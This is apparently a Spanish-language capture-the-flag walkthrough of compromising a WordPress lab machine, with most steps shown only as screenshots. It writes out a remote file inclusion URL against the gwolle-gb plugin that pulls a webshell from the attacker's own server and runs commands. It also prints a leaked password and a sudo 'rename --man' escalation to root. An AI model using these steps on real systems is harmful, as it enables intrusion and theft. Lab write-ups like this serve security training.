Hacemos el escaneo con nmap: {{pasted_image_20231129154012.png|}} Esto es lo que corre dentro del puerto 80: {{pasted_image_20231129154038.png|}} Hacemos fuzzing y vemos que corre un directorio llamado wordpress: {{pasted_image_20231129154119.png|}} Accedemos a dicho directorio, donde vemos que se trata de un wordpress, pero que no le carga correctamente la información: {{pasted_image_20231129154214.png|}} Por lo que vemos el código fuente y detectamos un dominio: {{pasted_image_20231129154238.png|}} Lo añadimos al /etc/hosts: {{pasted_image_20231129154309.png|}} Y ya nos carga bien la página: {{pasted_image_20231129154325.png|}} Procedemos a enumerar posibles usuarios y plugins de este wordpress, pero debemos de activar el modo agresivo: wpscan --url http://192.168.0.37/wordpress -e p --plugins-detection aggressive {{pasted_image_20231129155224.png|}} Y tenemos la siguiente ruta: {{pasted_image_20231129155319.png|}} Y detectamos la versión: {{pasted_image_20231129155343.png|}} Y tenemos en exploitdb un exploit de remote file inclusion: {{pasted_image_20231129155451.png|}} Y por aquí tenemos las instrucciones donde se nos dice que tenemos que estar alojando en un servidor web el comando malicioso que queramos ejecutar en la máquina víctima: {{pasted_image_20231129155536.png|}} Por lo que nos preparamos el servidor web malicioso donde vamos a estar alojando una webshell: {{pasted_image_20231129155649.png|}} {{pasted_image_20231129155706.png|}} Lo pegamos: {{pasted_image_20231129193646.png|}} Pero no funciona, y vemos en la petición del servidor de python que busca otro archivo: {{pasted_image_20231129194036.png|}} Por lo que vamos a renombrar la webshell a este mismo nombre: {{pasted_image_20231129194012.png|}} Volvemos a levantar un servidor http y hacemos la petición con el nuevo nombre: {{pasted_image_20231129194111.png|}} Y ahora vemos el resultado del comando: http://remote.nyx/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.32:8000/shell.php&cmd=whoami {{pasted_image_20231129194129.png|}} Obtenemos la reverse shell de revshells url encodeada: {{pasted_image_20231130100817.png|}} Lo pegamos y obtenemos la reverse shell: {{pasted_image_20231130100835.png|}} {{pasted_image_20231130100846.png|}} {{pasted_image_20231130100856.png|}} Y dentro del archivo config.php en el directorio wordpress nos encontramos con unas credenciales: {{pasted_image_20231130101209.png|}} Tenemos la contraseña del usuario Tiago: tiago:WPr00t3d123! {{pasted_image_20231130101322.png|}} Tenemos el siguiente binario que podemos ejecutarlo como root: {{pasted_image_20231130101417.png|}} Si ejecutamos el menú de ayuda del programa, vemos que podemos ejecutar las páginas man como root: {{pasted_image_20231130101701.png|}} Lo ejecutamos y una vez dentro lanzamos el comando de una bash: sudo /usr/bin/rename --man {{pasted_image_20231130101750.png|}} Y ya somos root: {{pasted_image_20231130101811.png|}}